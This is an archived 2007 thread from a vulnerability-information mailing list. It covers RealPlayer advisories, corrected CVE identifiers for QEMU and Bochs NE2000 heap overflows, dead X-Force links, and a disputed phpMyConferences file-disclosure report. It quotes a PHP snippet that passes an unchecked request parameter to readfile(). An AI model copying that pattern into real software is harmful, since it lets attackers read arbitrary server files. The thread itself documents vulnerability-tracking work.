Date: Mon, 29 Oct 2007 17:21:00 -0400 (EDT)
Subject: [VIM] Aleris Software Systems Web Publisher - site-specific?
In-Reply-To: <47264DC6.2080902@tenablesecurity.com>
References: <200710292100.l9TL0Ha1003141@faron.mitre.org> <47264DC6.2080902@tenablesecurity.com>
Message-ID:

On Mon, 29 Oct 2007, George A. Theall wrote:
> Based on the handful of sites I found to be using it, I would guess
> they're all designed by the same design firm (Courika Solutions); eg,

The site also had a product manual available for download, but it only covered the user interface - nothing about system requirements or installation.
- Steve

From theall at tenablesecurity.com Tue Oct 30 01:24:34 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 29 Oct 2007 21:24:34 -0400
Subject: [VIM] RealPlayer Updates of October 25, 2007
Message-ID: <472687D2.7070703@tenablesecurity.com>

Real released an advisory on October 25, 2007 about several overflows in RealPlayer and gives credit to Piotr Bania and several others. Also last week Piotr released two advisories covering issues in RealPlayer that could be triggered with a specially-crafted .mov file to execute code remotely:

  http://www.piotrbania.com/all/adv/realplayer-heap-corruption-adv.txt
  http://www.piotrbania.com/all/adv/realplayer-memory-corruption-adv.txt

Oddly, Real's advisory doesn't mention anything about .mov files per se. And neither of Piotr's advisories offers a solution, although they say Real responded to them a year ago.

Anyone else notice this? Are the issues related or not?

George
--
theall at tenablesecurity.com

From coley at mitre.org Tue Oct 30 21:37:20 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 30 Oct 2007 17:37:20 -0400 (EDT)
Subject: [VIM] Clarification on old QEMU/NE2000/Xen issues
Message-ID: <200710302137.l9ULbK0e029328@faron.mitre.org>

Do NOT ask me how long it took to iron all this out, but I thought I'd explain what I know so far, 'cause it's still not all set in stone :-(

In April/May, Tavis Ormandy released a paper on issues in emulator packages including Qemu, Bochs, and others. I had provided some CVEs to him, but there were a couple of gaps, and patches started getting released before I could resolve everything on vendor-sec (I share much of the blame in this for not actively following up, alas).

As a result of the internal confusion, we had:

CVE-2007-1321 being used in DEBIAN:DSA-1284 to actually talk about 3 separate issues, where REDHAT:RHSA-2007:0323 only meant to cover one of them with that same CVE.
CVE-2007-1323 was accidentally associated as part of the Qemu patches, but it was meant for Bochs (this error came from me making some poor formatting decisions in an email to vendor-sec).

Further complicating this was Xen, which had some of these issues; I still don't know which.

As of this moment, I've created a couple of CVEs.

CVE-2007-1321 - receive integer signedness
CVE-2007-5729 (NEW) - "mtu" heap overflow
CVE-2007-5730 (NEW) - "net socket" heap overflow
CVE-2007-1323 - REJECTED because it was used for multiple issues/products; Bochs NE2000 RX Frame heap overflow is CVE-2007-2893

I've got an inquiry in to see which of these lower-level CVEs were addressed in Xen.

Current CVEs are below.

- Steve

======================================================
Name: CVE-2007-1321
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1321
Reference: MISC:http://taviso.decsystem.org/virtsec.pdf
Reference: DEBIAN:DSA-1284
Reference: URL:http://www.debian.org/security/2007/dsa-1284
Reference: REDHAT:RHSA-2007:0323
Reference: URL:http://www.redhat.com/support/errata/RHSA-2007-0323.html

Integer signedness error in the NE2000 emulator in QEMU 0.8.2 allows local users to trigger a heap-based buffer overflow via certain register values that bypass sanity checks, aka QEMU NE2000 "receive" integer signedness error. NOTE: this identifier was inadvertently used by some sources to cover multiple issues that were labeled "NE2000 network driver and the socket code," but separate identifiers have been created for the individual vulnerabilities since there are sometimes different fixes; see CVE-2007-5729 and CVE-2007-5730.

======================================================
Name: CVE-2007-1323
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1323

** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2007-2893.
Reason: this candidate was intended for one issue, but some sources used this identifier for a separate issue, and a duplicate identifier had also been created by the time dual use was detected.
Notes: All CVE users should consult CVE-2007-2893 to determine if it is appropriate. All references and descriptions in this candidate have been removed to prevent accidental usage.

======================================================
Name: CVE-2007-2893
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2893
Reference: MISC:http://taviso.decsystem.org/virtsec.pdf
Reference: DEBIAN:DSA-1351
Reference: URL:http://www.debian.org/security/2007/dsa-1351
Reference: BID:24246
Reference: URL:http://www.securityfocus.com/bid/24246
Reference: FRSIRT:ADV-2007-1936
Reference: URL:http://www.frsirt.com/english/advisories/2007/1936
Reference: SECUNIA:25470
Reference: URL:http://secunia.com/advisories/25470
Reference: SECUNIA:26364
Reference: URL:http://secunia.com/advisories/26364
Reference: XF:bochs-ne2000-bo(34508)
Reference: URL:http://xforce.iss.net/xforce/xfdb/34508

Heap-based buffer overflow in the bx_ne2k_c::rx_frame function in iodev/ne2k.cc in the emulated NE2000 device in Bochs 2.3 allows local users of the guest operating system to write to arbitrary memory locations and gain privileges on the host operating system via vectors that cause TXCNT register values to exceed the device memory size, aka "RX Frame heap overflow."
======================================================
Name: CVE-2007-5729
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5729
Reference: MISC:http://taviso.decsystem.org/virtsec.pdf
Reference: DEBIAN:DSA-1284
Reference: URL:http://www.debian.org/security/2007/dsa-1284

The NE2000 emulator in QEMU 0.8.2 allows local users to execute arbitrary code by writing Ethernet frames with a size larger than the MTU to the EN0_TCNT register, which triggers a heap-based buffer overflow in the slirp library, aka NE2000 "mtu" heap overflow. NOTE: some sources have used CVE-2007-1321 to refer to this issue as part of "NE2000 network driver and the socket code," but this is the correct identifier for the mtu overflow vulnerability.

======================================================
Name: CVE-2007-5730
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5730
Reference: MISC:http://taviso.decsystem.org/virtsec.pdf
Reference: DEBIAN:DSA-1284
Reference: URL:http://www.debian.org/security/2007/dsa-1284

Heap-based buffer overflow in QEMU 0.8.2 allows local users to execute arbitrary code via crafted data in the "net socket listen" option, aka QEMU "net socket" heap overflow. NOTE: some sources have used CVE-2007-1321 to refer to this issue as part of "NE2000 network driver and the socket code," but this is the correct identifier for the individual net socket listen vulnerability.

From coley at mitre.org Tue Oct 30 22:53:04 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 30 Oct 2007 18:53:04 -0400 (EDT)
Subject: [VIM] Old ISS X-Force links seem dead
Message-ID: <200710302253.l9UMr4cZ000731@faron.mitre.org>

Dead links include:

  http://xforce.iss.net/xforce/xfdb/27763
  http://xforce.iss.net/xforce/xfdb/13419
  http://xforce.iss.net/xforce/xfdb/31307
  http://xforce.iss.net/xforce/xfdb/35492

and who knows how many thousands of others (at least 14000 in CVE).
But http://xforce.iss.net/xforce/xfdb/38134 seems alive (that's from Oct 29). I'll send an inquiry.

- Steve

From theall at tenablesecurity.com Wed Oct 31 20:14:15 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Wed, 31 Oct 2007 16:14:15 -0400
Subject: [VIM] phpMyConferences <= 8.0.2 Remote File Disclosure Vulnerability
Message-ID: <4728E217.2000702@tenablesecurity.com>

I don't know how many sites are actually affected by this. Here's the affected script as it appears in version 8.0.2:

  header("Content-disposition: attachment; filename=".$_GET('filname']);
  header("Content-Type: application/force-download");
  header("Content-Transfer-Encoding: binary");
  header("Content-Length: ".filesize($_GET['dir']));
  header("Pragma: no-cache");
  header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
  header("Expires: 0");
  readfile($_GET['dir']);

  ?>

Notice the unclosed bracket in the second line above? php can't parse it.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com Wed Oct 31 20:48:45 2007
From: str0ke at milw0rm.com (str0ke)
Date: Wed, 31 Oct 2007 15:48:45 -0500
Subject: [VIM] phpMyConferences <= 8.0.2 Remote File Disclosure Vulnerability
In-Reply-To: <4728E217.2000702@tenablesecurity.com>
References: <4728E217.2000702@tenablesecurity.com>
Message-ID: <4728EA2D.9070701@milw0rm.com>

Removing this on my side. Good find, man.

/str0ke

George A. Theall wrote:
> I don't know how many sites are actually affected by this. Here's the
> affected script as it appears in version 8.0.2:
>
> header("Content-disposition: attachment; filename=".$_GET('filname']);
> header("Content-Type: application/force-download");
> header("Content-Transfer-Encoding: binary");
> header("Content-Length: ".filesize($_GET['dir']));
> header("Pragma: no-cache");
> header("Cache-Control: no-store, no-cache, must-revalidate,
> post-check=0, pre-check=0");
> header("Expires: 0");
> readfile($_GET['dir']);
>
> ?>
>
> Notice the unclosed bracket in the second line above? php can't parse it.
>
>
> George